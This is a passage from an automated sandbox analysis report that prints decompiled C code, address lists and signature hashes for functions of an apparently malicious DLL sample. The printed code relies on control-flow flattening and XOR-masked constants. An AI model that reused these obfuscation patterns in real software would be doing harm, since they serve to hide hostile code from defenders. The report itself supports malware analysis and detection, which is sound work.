										_t241 = _t241 + _t207;
										continue;
									} else {
										if(_t216 != 0x5e83455) {
											goto L17;
										} else {
											_push(_t216);
											_t210 = E00D407F0();
											_t243 =  &(_t243[1]);
											_t216 = 0x530d654;
											_t241 = _t241 + _t210;
											continue;
										}
									}
								}
							}
						}
						L20:
						return _t241;
					}
					if(_t216 == 0x8a5806a) {
						_push(_t216);
						_t198 = E00D407F0();
						_t243 =  &(_t243[1]);
						_t216 = 0x8a1c17;
						_t241 = _t241 + _t198;
						goto L17;
					} else {
						if(_t216 == 0xe6264d6) {
							_t199 = E00D4BE8C(_t214 + 0x4c, _v76, _v44, _v48, _v24);
							_t243 =  &(_t243[3]);
							_t216 = 0x5e83455;
							_t241 = _t241 + _t199;
							goto L1;
						} else {
							if(_t216 != 0xf218af8) {
								goto L17;
							} else {
								_push(_t216);
								_t213 = E00D407F0();
								_t243 =  &(_t243[1]);
								_t216 = 0x50fe579;
								_t241 = _t241 + _t213;
								goto L1;
							}
						}
					}
					goto L20;
					L17:
				} while (_t216 != 0x3fc4e73);
				goto L20;
			}

0x00d3f369
0x00d3f36c
0x00d3f380
0x00d3f388
0x00d3f38a
0x00d3f38c
0x00d3f38e
0x00d3f38f
0x00d3f390
0x00d3f39c
0x00d3f3a1
0x00d3f3a7
0x00d3f3b4
0x00d3f3b7
0x00d3f3bb
0x00d3f3c3
0x00d3f3cb
0x00d3f3db
0x00d3f3df
0x00d3f3e7
0x00d3f3ef
0x00d3f3fb
0x00d3f400
0x00d3f406
0x00d3f40e
0x00d3f416
0x00d3f41e
0x00d3f426
0x00d3f42e
0x00d3f436
0x00d3f43f
0x00d3f444
0x00d3f44a
0x00d3f452
0x00d3f462
0x00d3f46a
0x00d3f472
0x00d3f477
0x00d3f47f
0x00d3f487
0x00d3f48f
0x00d3f497
0x00d3f49f
0x00d3f4a4
0x00d3f4ac
0x00d3f4b4
0x00d3f4c1
0x00d3f4c2
0x00d3f4c6
0x00d3f4ce
0x00d3f4d6
0x00d3f4e4
0x00d3f4ea
0x00d3f4ef
0x00d3f4f7
0x00d3f4ff
0x00d3f504
0x00d3f50c
0x00d3f514
0x00d3f51c
0x00d3f524
0x00d3f52c
0x00d3f534
0x00d3f539
0x00d3f541
0x00d3f549
0x00d3f551
0x00d3f559
0x00d3f561
0x00d3f569
0x00d3f571
0x00d3f579
0x00d3f581
0x00d3f589
0x00d3f591
0x00d3f599
0x00d3f5a7
0x00d3f5af
0x00d3f5b3
0x00d3f5bb
0x00d3f5c0
0x00d3f5c8
0x00d3f5d0
0x00d3f5d8
0x00d3f5e0
0x00d3f5ed
0x00d3f5f1
0x00d3f5f9
0x00d3f5f9
0x00d3f601
0x00d3f601
0x00d3f601
0x00d3f601
0x00d3f603
0x00000000
0x00000000
0x00d3f605
0x00d3f67d
0x00000000
0x00d3f607
0x00d3f60d
0x00d3f66b
0x00d3f66c
0x00d3f671
0x00d3f674
0x00d3f679
0x00000000
0x00d3f60f
0x00d3f615
0x00d3f71a
0x00d3f61b
0x00d3f621
0x00d3f651
0x00d3f652
0x00d3f657
0x00d3f65a
0x00d3f65f
0x00000000
0x00d3f623
0x00d3f629
0x00000000
0x00d3f62f
0x00d3f637
0x00d3f638
0x00d3f63d
0x00d3f640
0x00d3f645
0x00000000
0x00d3f645
0x00d3f629
0x00d3f621
0x00d3f615
0x00d3f60d
0x00d3f71d
0x00d3f725
0x00d3f725
0x00d3f687
0x00d3f6e1
0x00d3f6e2
0x00d3f6e7
0x00d3f6ea
0x00d3f6ef
0x00000000
0x00d3f689
0x00d3f68b
0x00d3f6c5
0x00d3f6ca
0x00d3f6cd
0x00d3f6d2
0x00000000
0x00d3f68d
0x00d3f693
0x00000000
0x00d3f695
0x00d3f69d
0x00d3f69e
0x00d3f6a3
0x00d3f6a6
0x00d3f6ab
0x00000000
0x00d3f6ab
0x00d3f693
0x00d3f68b
0x00000000
0x00d3f6f1
0x00d3f6f1
0x00000000

Strings

rCx/, xrefs: 00D3F5D8
a?E, xrefs: 00D3F462
_3, xrefs: 00D3F48F
Uo>, xrefs: 00D3F571
,>, xrefs: 00D3F42E
l0, xrefs: 00D3F599

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: ,>$Uo>$_3$a?E$l0$rCx/
API String ID: 0-1805074986
Opcode ID: aee53d98fdbd87342a85eaa3d07f56d671f8fcd94221aca7db3dcd7928f6070b
Instruction ID: 6cc7407f410a7cd68e33c06ae25d32fc6929b3867500509d8c2beff4a4d86a5e
Opcode Fuzzy Hash: aee53d98fdbd87342a85eaa3d07f56d671f8fcd94221aca7db3dcd7928f6070b
Instruction Fuzzy Hash: 409145B29083419BC358CF25D58A41FBBF1FBD5758F144A2DFAC696260D3B6C9088B53

Uniqueness

Uniqueness Score: -1.00%

Function 00D48806, Relevance: 7.7, Strings: 6, Instructions: 201
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00D48806(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				void* _t156;
				void* _t172;
				void* _t174;
				void* _t177;
				void* _t182;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				void* _t189;
				intOrPtr _t216;
				signed int* _t219;

				_t215 = _a8;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00D4FE29(_t156);
				_v76 = 0x923182;
				_t219 =  &(( &_v140)[4]);
				_v72 = 0xa31cb9;
				_t216 = 0;
				_v68 = 0;
				_v64 = 0;
				_t189 = 0xe0c62fa;
				_v120 = 0x4473bb;
				_t183 = 0x46;
				_v120 = _v120 / _t183;
				_v120 = _v120 << 6;
				_v120 = _v120 ^ 0x003879f9;
				_v100 = 0x40bbdb;
				_t184 = 0x64;
				_v100 = _v100 * 0x13;
				_v100 = _v100 ^ 0x04c6e1a5;
				_v140 = 0x8d0a20;
				_v140 = _v140 * 0x6a;
				_v140 = _v140 + 0x25b5;
				_v140 = _v140 * 0x47;
				_v140 = _v140 ^ 0x32607187;
				_v84 = 0x381a9b;
				_v84 = _v84 + 0xbdad;
				_v84 = _v84 ^ 0x00352eaa;
				_v124 = 0x2aec69;
				_v124 = _v124 | 0x10e7a47b;
				_v124 = _v124 ^ 0x113e433b;
				_v124 = _v124 / _t184;
				_v124 = _v124 ^ 0x000f1a56;
				_v80 = 0x7d6845;
				_v80 = _v80 + 0xffff13df;
				_v80 = _v80 ^ 0x0079135d;
				_v92 = 0x295f3e;
				_v92 = _v92 + 0xbf8d;
				_v92 = _v92 ^ 0x0026878e;
				_v116 = 0x37f4f;
				_v116 = _v116 << 6;
				_v116 = _v116 + 0x3a5c;
				_v116 = _v116 ^ 0x00effc52;
				_v132 = 0xa2ba8e;
				_v132 = _v132 + 0x1d0a;
				_v132 = _v132 | 0x3462f83d;
				_t185 = 0x33;
				_v132 = _v132 * 0x30;
				_v132 = _v132 ^ 0xea8b61c3;
				_v128 = 0xc1a215;
				_v128 = _v128 / _t185;
				_v128 = _v128 | 0x8f52208d;
				_v128 = _v128 + 0x2564;
				_v128 = _v128 ^ 0x8f53844f;
				_v108 = 0x49ebcc;
				_v108 = _v108 * 0x2a;
				_v108 = _v108 ^ 0x0c2cea59;
				_v136 = 0x4a157a;
				_t186 = 0x59;
				_v136 = _v136 / _t186;
				_v136 = _v136 >> 1;
				_v136 = _v136 << 9;
				_v136 = _v136 ^ 0x00dde8e3;
				_v96 = 0x85f352;
				_v96 = _v96 | 0xf8883f30;
				_v96 = _v96 ^ 0xf88ae245;
				_v104 = 0xc8529d;
				_v104 = _v104 >> 8;
				_v104 = _v104 ^ 0x00006ec5;
				_v88 = 0xa01b;
				_v88 = _v88 + 0xf4b;
				_v88 = _v88 ^ 0x0002d8bd;
				_v112 = 0x376510;
				_v112 = _v112 >> 1;
				_v112 = _v112 + 0x6895;
				_v112 = _v112 ^ 0x001ca4c8;
				do {
					while(_t189 != 0x2d570bf) {
						if(_t189 == 0x2e69388) {
							_t174 = E00D52BF0(_v80,  &_v60, _v92, _v116, _t215 + 0xc);
							_t219 =  &(_t219[3]);
							__eflags = _t174;
							if(__eflags != 0) {
								_t189 = 0xed0c1fc;
								continue;
							}
						} else {
							if(_t189 == 0xa1356c9) {
								_t177 = E00D52BF0(_v140,  &_v60, _v84, _v124, _t215 + 0x48);
								_t219 =  &(_t219[3]);
								__eflags = _t177;
								if(__eflags != 0) {
									_t189 = 0x2e69388;
									continue;
								}
							} else {
								if(_t189 == 0xd5f0997) {
									__eflags = E00D49D3E( &_v60, _v88, __eflags, _v112, _t215);
									_t216 =  !=  ? 1 : _t216;
								} else {
									if(_t189 == 0xe0c62fa) {
										_t189 = 0xe1d6fcd;
										continue;
									} else {
										if(_t189 == 0xe1d6fcd) {
											E00D322A6(_a4, _v120,  &_v60, _v100);
											_t219 =  &(_t219[2]);
											_t189 = 0xa1356c9;
											continue;
										} else {
											if(_t189 != 0xed0c1fc) {
												goto L19;
											} else {
												_t182 = E00D52BF0(_v132,  &_v60, _v128, _v108, _t215 + 0x1c);
												_t219 =  &(_t219[3]);
												if(_t182 != 0) {
													_t189 = 0x2d570bf;
													continue;
												}
											}
										}
									}
								}
							}
						}
						L22:
						return _t216;
					}
					_t172 = E00D52BF0(_v136,  &_v60, _v96, _v104, _t215 + 0x3c);
					_t219 =  &(_t219[3]);
					__eflags = _t172;
					if(__eflags == 0) {
						_t189 = 0x63acd9;
						goto L19;
					} else {
						_t189 = 0xd5f0997;
						continue;
					}
					goto L22;
					L19:
					__eflags = _t189 - 0x63acd9;
				} while (__eflags != 0);
				goto L22;
			}

0x00d48810
0x00d48817
0x00d48818
0x00d4881f
0x00d48820
0x00d48821
0x00d48826
0x00d4882e
0x00d48831
0x00d48839
0x00d4883b
0x00d48841
0x00d48845
0x00d4884a
0x00d48858
0x00d4885d
0x00d48863
0x00d48868
0x00d48870
0x00d4887d
0x00d48880
0x00d48884
0x00d4888c
0x00d48899
0x00d4889d
0x00d488aa
0x00d488ae
0x00d488b6
0x00d488be
0x00d488c6
0x00d488ce
0x00d488d6
0x00d488de
0x00d488ee
0x00d488f2
0x00d488fa
0x00d48902
0x00d4890a
0x00d48912
0x00d4891a
0x00d48922
0x00d4892a
0x00d48932
0x00d48937
0x00d4893f
0x00d48947
0x00d4894f
0x00d48957
0x00d48964
0x00d48965
0x00d48969
0x00d48971
0x00d4897f
0x00d48983
0x00d4898b
0x00d48993
0x00d4899b
0x00d489a8
0x00d489ac
0x00d489b4
0x00d489c4
0x00d489d1
0x00d489d5
0x00d489d9
0x00d489de
0x00d489e6
0x00d489ee
0x00d489f6
0x00d489fe
0x00d48a06
0x00d48a0b
0x00d48a13
0x00d48a1b
0x00d48a23
0x00d48a2b
0x00d48a33
0x00d48a37
0x00d48a3f
0x00d48a47
0x00d48a47
0x00d48a51
0x00d48b22
0x00d48b27
0x00d48b2a
0x00d48b2c
0x00d48b2e
0x00000000
0x00d48b2e
0x00d48a57
0x00d48a5d
0x00d48af7
0x00d48afc
0x00d48aff
0x00d48b01
0x00d48b07
0x00000000
0x00d48b07
0x00d48a63
0x00d48a69
0x00d48b8c
0x00d48b8e
0x00d48a6f
0x00d48a75
0x00d48ad9
0x00000000
0x00d48a77
0x00d48a7d
0x00d48ac7
0x00d48acc
0x00d48acf
0x00000000
0x00d48a7f
0x00d48a85
0x00000000
0x00d48a8b
0x00d48a9f
0x00d48aa4
0x00d48aa9
0x00d48aaf
0x00000000
0x00d48aaf
0x00d48aa9
0x00d48a85
0x00d48a7d
0x00d48a75
0x00d48a69
0x00d48a5d
0x00d48b92
0x00d48b9d
0x00d48b9d
0x00d48b4c
0x00d48b51
0x00d48b54
0x00d48b56
0x00d48b62
0x00000000
0x00d48b58
0x00d48b58
0x00000000
0x00d48b58
0x00000000
0x00d48b67
0x00d48b67
0x00d48b67
0x00000000

Strings

d%, xrefs: 00D4898B
i*, xrefs: 00D488CE
$P, xrefs: 00D4880E
>_), xrefs: 00D48912
\:, xrefs: 00D48937
Eh}, xrefs: 00D488FA

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: $P$>_)$Eh}$\:$d%$i*
API String ID: 0-2969320698
Opcode ID: aeffe686daea30544195ed0138f6e4945c8625af026a6e1ad50bc3102dfd4890
Instruction ID: 5516e40457d3d03de8c53c9486f7833844d7cf64c8a6ddccb9aefcc8138527e8
Opcode Fuzzy Hash: aeffe686daea30544195ed0138f6e4945c8625af026a6e1ad50bc3102dfd4890
Instruction Fuzzy Hash: 349164B15083019FC718CF21D58692FBBE1EBC4748F04892EF59696260D7B5CA09DFA3

Uniqueness

Uniqueness Score: -1.00%

Function 00D3BFBE, Relevance: 7.6, Strings: 6, Instructions: 149
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00D3BFBE(void* __edx, intOrPtr* _a4, intOrPtr _a8) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				void* __ecx;
				void* _t131;
				signed int _t135;
				signed int _t139;
				void* _t143;
				void* _t146;
				void* _t157;
				signed int _t158;
				signed int _t159;
				void* _t161;
				signed int* _t163;

				_t144 = _a4;
				_push(_a8);
				_t161 = __edx;
				_push(_a4);
				_push(__edx);
				E00D4FE29(_t131);
				_v56 = 0x2e7fee;
				_t163 =  &(( &_v68)[4]);
				_v56 = _v56 | 0x8bf0d90c;
				_v56 = _v56 + 0xffff841c;
				_t157 = 0;
				_v56 = _v56 ^ 0x8bfe8408;
				_t146 = 0xe8f06a4;
				_v20 = 0xd3cae8;
				_v20 = _v20 + 0xffff2712;
				_v20 = _v20 ^ 0x00d2f1ea;
				_v16 = 0xd3a0fd;
				_t158 = 0x75;
				_v16 = _v16 / _t158;
				_v16 = _v16 ^ 0x4001cf0d;
				_v40 = 0x4f1d62;
				_v40 = _v40 + 0xffffc4cc;
				_v40 = _v40 + 0xffffbca6;
				_v40 = _v40 ^ 0x004e2d6a;
				_v8 = 0x24ed33;
				_v8 = _v8 << 7;
				_v8 = _v8 ^ 0x1279d784;
				_v12 = 0xe170a7;
				_t135 = _v12;
				_t159 = 0x28;
				_t155 = _t135 % _t159;
				_v12 = _t135 / _t159;
				_v12 = _v12 ^ 0x0006bc2e;
				_v44 = 0x4d8c8f;
				_v44 = _v44 | 0xffeffd4f;
				_v44 = _v44 ^ 0xffe079b2;
				_v48 = 0xc3edaa;
				_v48 = _v48 >> 0x10;
				_v48 = _v48 + 0xd49e;
				_v48 = _v48 ^ 0x0004c7fe;
				_v68 = 0x67444f;
				_v68 = _v68 + 0x90d;
				_v68 = _v68 * 0x5b;
				_v68 = _v68 | 0x263824b0;
				_v68 = _v68 ^ 0x26bf9150;
				_v52 = 0xb09b3a;
				_v52 = _v52 ^ 0xfa5715e4;
				_v52 = _v52 ^ 0xfae78c15;
				_v24 = 0xeb1207;
				_v24 = _v24 + 0xffffe226;
				_v24 = _v24 ^ 0x00e7632f;
				_v28 = 0x3b6554;
				_v28 = _v28 ^ 0x4e84398c;
				_v28 = _v28 ^ 0x4eb32e0d;
				_v60 = 0x36daca;
				_v60 = _v60 ^ 0xae85a6ca;
				_v60 = _v60 ^ 0x532e6d02;
				_v60 = _v60 ^ 0xfd946988;
				_v64 = 0xe9416a;
				_v64 = _v64 >> 0xc;
				_v64 = _v64 >> 1;
				_v64 = _v64 ^ 0x000bb9db;
				_v32 = 0xb764c3;
				_v32 = _v32 << 0xe;
				_v32 = _v32 ^ 0xd93a5796;
				_v4 = 0xb5f3f2;
				_v4 = _v4 ^ 0xf880d4e7;
				_v4 = _v4 ^ 0xf834d19c;
				_t160 = _v4;
				_v36 = 0x2d4acf;
				_v36 = _v36 | 0x966edff9;
				_v36 = _v36 ^ 0x966c13d3;
				do {
					while(_t146 != 0x2926179) {
						if(_t146 == 0x8f0c602) {
							E00D51538(_v4, _v36, _t160);
						} else {
							if(_t146 == 0xb296bf4) {
								_t143 = E00D4C41A(_v24, _t155, _v28,  *_t144, _v60, _t160, _t144 + 4, _v64, _v32,  *((intOrPtr*)(_t144 + 4)));
								_t163 =  &(_t163[8]);
								_t157 = _t143;
								_t146 = 0x8f0c602;
								continue;
							} else {
								if(_t146 != 0xe8f06a4) {
									goto L10;
								} else {
									_t146 = 0x2926179;
									continue;
								}
							}
						}
						L13:
						return _t157;
					}
					_t155 = _v40;
					_t139 = E00D545CA(_t161, _v40, _t146, _t146, _v8, _v12, _v44, _v16, _v48, _v68, _v20, _v52, _v56, 0);
					_t160 = _t139;
					_t163 =  &(_t163[0xc]);
					if(_t139 == 0xffffffff) {
						_t146 = 0xe2d92d;
						goto L10;
					} else {
						_t146 = 0xb296bf4;
						continue;
					}
					goto L13;
					L10:
				} while (_t146 != 0xe2d92d);
				goto L13;
			}

0x00d3bfc2
0x00d3bfc9
0x00d3bfcd
0x00d3bfcf
0x00d3bfd0
0x00d3bfd2
0x00d3bfd7
0x00d3bfdf
0x00d3bfe2
0x00d3bfec
0x00d3bff4
0x00d3bff6
0x00d3bffe
0x00d3c003
0x00d3c00b
0x00d3c013
0x00d3c01b
0x00d3c029
0x00d3c02e
0x00d3c034
0x00d3c03c
0x00d3c044
0x00d3c04c
0x00d3c054
0x00d3c05c
0x00d3c064
0x00d3c069
0x00d3c071
0x00d3c079
0x00d3c07d
0x00d3c07e
0x00d3c080
0x00d3c084
0x00d3c08c
0x00d3c094
0x00d3c09c
0x00d3c0a4
0x00d3c0ac
0x00d3c0b1
0x00d3c0b9
0x00d3c0c1
0x00d3c0c9
0x00d3c0d6
0x00d3c0da
0x00d3c0e2
0x00d3c0ea
0x00d3c0fa
0x00d3c102
0x00d3c10a
0x00d3c112
0x00d3c11a
0x00d3c122
0x00d3c12a
0x00d3c132
0x00d3c13a
0x00d3c142
0x00d3c14a
0x00d3c152
0x00d3c15a
0x00d3c162
0x00d3c167
0x00d3c16b
0x00d3c173
0x00d3c17b
0x00d3c180
0x00d3c188
0x00d3c190
0x00d3c198
0x00d3c1a0
0x00d3c1a4
0x00d3c1ac
0x00d3c1b4
0x00d3c1bc
0x00d3c1bc
0x00d3c1ca
0x00d3c27c
0x00d3c1d0
0x00d3c1d6
0x00d3c208
0x00d3c20d
0x00d3c210
0x00d3c212
0x00000000
0x00d3c1d8
0x00d3c1de
0x00000000
0x00d3c1e4
0x00d3c1e4
0x00000000
0x00d3c1e4
0x00d3c1de
0x00d3c1d6
0x00d3c282
0x00d3c28b
0x00d3c28b
0x00d3c23f
0x00d3c247
0x00d3c24c
0x00d3c24e
0x00d3c254
0x00d3c260
0x00000000
0x00d3c256
0x00d3c256
0x00000000
0x00d3c256
0x00000000
0x00d3c265
0x00d3c265
0x00000000

Strings

jA, xrefs: 00D3C15A
j-N, xrefs: 00D3C054
3$, xrefs: 00D3C05C
/c, xrefs: 00D3C11A
ODg, xrefs: 00D3C0C1
Te;, xrefs: 00D3C122

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: /c$3$$ODg$Te;$j-N$jA
API String ID: 0-1439100758
Opcode ID: 6beecac5511420f763a8f2b06641e78c47f08b7496e3c8d03a53748897a012dd
Instruction ID: 9ef0c0f0fa8e4a9907f47e251df95399e8f69fac4ec45ff1662b813f257b31d8
Opcode Fuzzy Hash: 6beecac5511420f763a8f2b06641e78c47f08b7496e3c8d03a53748897a012dd
Instruction Fuzzy Hash: E16145710183409FC798CFA5D89A81FBBE1FBC5318F405A1DF6D696260C3B5C919CB56

Uniqueness

Uniqueness Score: -1.00%

Function 00D42142, Relevance: 6.6, Strings: 5, Instructions: 329
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E00D42142() {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				unsigned int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				unsigned int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				void* _t368;
				intOrPtr _t378;
				intOrPtr _t383;
				intOrPtr _t384;
				intOrPtr _t389;
				void* _t390;
				void* _t391;
				signed int _t393;
				signed int _t394;
				signed int _t395;
				signed int _t396;
				signed int _t397;
				signed int _t398;
				signed int _t399;
				signed int _t400;
				signed int _t401;
				signed int _t402;
				signed int _t403;
				intOrPtr _t438;
				intOrPtr _t439;
				intOrPtr _t441;
				void* _t444;
				signed int _t446;
				signed int* _t448;

				_t448 =  &_v160;
				_v16 = 0x961399;
				_v12 = 0x301936;
				_v8 = 0xe566e6;
				_t391 = 0;
				_t444 = 0x374f925;
				_v4 = _v4 & 0;
				_v108 = 0x7426fd;
				_v108 = _v108 + 0xfffff8c3;
				_t393 = 0x2b;
				_push("true");
				_v108 = _v108 / _t393;
				_v108 = _v108 ^ 0x0002b357;
				_v156 = 0x38452;
				_v156 = _v156 + 0x4117;
				_pop(_t394);
				_v156 = _v156 * 0x30;
				_v156 = _v156 + 0xffff7c1f;
				_v156 = _v156 ^ 0x00b47fcf;
				_v152 = 0x5ef941;
				_v152 = _v152 * 0x43;
				_v152 = _v152 >> 7;
				_v152 = _v152 << 6;
				_v152 = _v152 ^ 0x0c6d9e00;
				_v120 = 0x18b538;
				_v120 = _v120 * 0x11;
				_v120 = _v120 + 0xffffc33e;
				_v120 = _v120 >> 0xd;
				_v120 = _v120 ^ 0x00000d1e;
				_v112 = 0x5e5e29;
				_v112 = _v112 + 0x9b22;
				_v112 = _v112 / _t394;
				_v112 = _v112 ^ 0x0002e0c4;
				_v144 = 0x808e79;
				_v144 = _v144 | 0xf9cc6bdf;
				_v144 = _v144 + 0xffff3e00;
				_v144 = _v144 << 0xf;
				_v144 = _v144 ^ 0x16ff716d;
				_v28 = 0xba41b5;
				_v28 = _v28 + 0xffffb1dd;
				_v28 = _v28 ^ 0x00b49e8e;
				_v68 = 0x38cb33;
				_v68 = _v68 >> 2;
				_v68 = _v68 ^ 0x000b8367;
				_v44 = 0xd85990;
				_v44 = _v44 ^ 0x9ad510f8;
				_v44 = _v44 ^ 0x9a039936;
				_v104 = 0xf87474;
				_t395 = 0x22;
				_v104 = _v104 / _t395;
				_v104 = _v104 >> 7;
				_v104 = _v104 ^ 0x000753f7;
				_v36 = 0x3be84a;
				_v36 = _v36 << 6;
				_v36 = _v36 ^ 0x0ef6677c;
				_v128 = 0x4404d4;
				_v128 = _v128 ^ 0xb10c689b;
				_t396 = 0x5e;
				_v128 = _v128 / _t396;
				_v128 = _v128 ^ 0x298e6a61;
				_v128 = _v128 ^ 0x28610484;
				_v80 = 0xdf65bd;
				_t397 = 0x7c;
				_v80 = _v80 / _t397;
				_v80 = _v80 ^ 0x00023fe8;
				_v96 = 0x7747b3;
				_v96 = _v96 << 0xd;
				_t398 = 0x29;
				_v96 = _v96 * 0x16;
				_v96 = _v96 ^ 0x052c7385;
				_v88 = 0xae51fb;
				_v88 = _v88 + 0x359a;
				_v88 = _v88 | 0x8b717ce6;
				_v88 = _v88 ^ 0x8bfa7840;
				_v24 = 0xcaf683;
				_v24 = _v24 >> 7;
				_v24 = _v24 ^ 0x00013e33;
				_v52 = 0xefed62;
				_v52 = _v52 | 0x058c509b;
				_v52 = _v52 ^ 0x05e11655;
				_v160 = 0xbd94ea;
				_v160 = _v160 + 0x2a3a;
				_v160 = _v160 >> 5;
				_v160 = _v160 + 0x96e3;
				_v160 = _v160 ^ 0x0003401d;
				_v72 = 0x73d84b;
				_v72 = _v72 + 0x3d83;
				_v72 = _v72 ^ 0x007dedc2;
				_v76 = 0xd9453f;
				_v76 = _v76 >> 1;
				_v76 = _v76 ^ 0x006ac7af;
				_v140 = 0x85d58e;
				_v140 = _v140 * 0x2c;
				_v140 = _v140 >> 4;
				_v140 = _v140 / _t398;
				_v140 = _v140 ^ 0x000cf91a;
				_v100 = 0x1458f8;
				_v100 = _v100 ^ 0xd74f5ef9;
				_t399 = 0x5f;
				_v100 = _v100 / _t399;
				_v100 = _v100 ^ 0x0247f1d9;
				_v64 = 0x476ab5;
				_v64 = _v64 + 0xffff3492;
				_v64 = _v64 ^ 0x004c13d1;
				_v148 = 0x4dca07;
				_v148 = _v148 + 0xffff4a4e;
				_v148 = _v148 + 0xffff2093;
				_v148 = _v148 ^ 0x004c8279;
				_v136 = 0xa6ed90;
				_v136 = _v136 >> 2;
				_v136 = _v136 | 0x950d13bb;
				_v136 = _v136 >> 0xf;
				_v136 = _v136 ^ 0x000e92a5;
				_v60 = 0xea20ae;
				_v60 = _v60 * 0x5d;
				_v60 = _v60 ^ 0x550aff98;
				_v92 = 0xe3a2d4;
				_v92 = _v92 >> 6;
				_v92 = _v92 * 0x28;
				_v92 = _v92 ^ 0x008d85d0;
				_v132 = 0x9d5db8;
				_v132 = _v132 + 0xffff1bd6;
				_t400 = 0x1b;
				_v132 = _v132 / _t400;
				_v132 = _v132 << 0xa;
				_v132 = _v132 ^ 0x17217366;
				_v56 = 0xa7c0ff;
				_t401 = 0x35;
				_v56 = _v56 / _t401;
				_v56 = _v56 ^ 0x000623f9;
				_v116 = 0xf9a70;
				_v116 = _v116 >> 0xa;
				_v116 = _v116 >> 5;
				_v116 = _v116 + 0xffffd532;
				_v116 = _v116 ^ 0xfff34a0b;
				_v124 = 0xd1e957;
				_v124 = _v124 << 3;
				_t402 = 0x76;
				_v124 = _v124 / _t402;
				_v124 = _v124 + 0x1a27;
				_v124 = _v124 ^ 0x000dfee3;
				_v84 = 0x8b01d8;
				_t403 = 0x34;
				_v84 = _v84 * 0x70;
				_v84 = _v84 / _t403;
				_v84 = _v84 ^ 0x0120e28f;
				_v32 = 0xcb988c;
				_v32 = _v32 ^ 0x945cb942;
				_v32 = _v32 ^ 0x9495c850;
				_v40 = 0x79d8e1;
				_v40 = _v40 >> 9;
				_v40 = _v40 ^ 0x000c7724;
				_v48 = 0xc03196;
				_v48 = _v48 ^ 0x1279a3f1;
				_v48 = _v48 ^ 0x12baef9a;
				while(1) {
					L1:
					_t368 = 0x9ae396c;
					do {
						L2:
						if(_t444 == 0x19911bc) {
							_push(_v52);
							_push(_v24);
							_push(_v88);
							_t446 = E00D4E1F8(0xd31a20, _v96, __eflags);
							__eflags = E00D3738A(_v160, _t446, _v72, _v108,  &_v20, 0, _v76) - _v156;
							_t403 = _t446;
							_t444 =  ==  ? 0x9ae396c : 0x7737a40;
							E00D4FECB(_t403, _v140, _v100, _v64, _v148);
							_t448 =  &(_t448[0xb]);
							_t368 = 0x9ae396c;
							goto L12;
						}
						if(_t444 == 0x374f925) {
							_push(_t403);
							_push(_t403);
							_t378 = E00D3C5D8(0x44);
							 *0xd56220 = _t378;
							 *((intOrPtr*)(_t378 + 0x28)) = 0x4000;
							_t383 =  *0xd56220; // 0x0
							_t384 = E00D3C5D8( *((intOrPtr*)(_t383 + 0x28)));
							_t438 =  *0xd56220; // 0x0
							_t448 =  &(_t448[4]);
							_t444 = 0x19911bc;
							_t403 =  *((intOrPtr*)(_t438 + 0x28)) + _t384;
							 *((intOrPtr*)(_t438 + 0x24)) = _t384;
							 *((intOrPtr*)(_t438 + 0x14)) = _t384;
							 *((intOrPtr*)(_t438 + 0x1c)) = _t384;
							 *(_t438 + 0x20) = _t403;
							while(1) {
								L1:
								_t368 = 0x9ae396c;
								goto L2;
							}
						}
						if(_t444 == 0x7737a40) {
							_t439 =  *0xd56220; // 0x0
							E00D52B09(_v116,  *((intOrPtr*)(_t439 + 0x24)), _v124, _v84);
							_t441 =  *0xd56220; // 0x0
							E00D52B09(_v32, _t441, _v40, _v48);
							L16:
							return _t391;
						}
						if(_t444 == 0x9042860) {
							E00D3F7FE(_v132, _v20, _v56, _v112);
							goto L16;
						}
						if(_t444 != _t368) {
							goto L12;
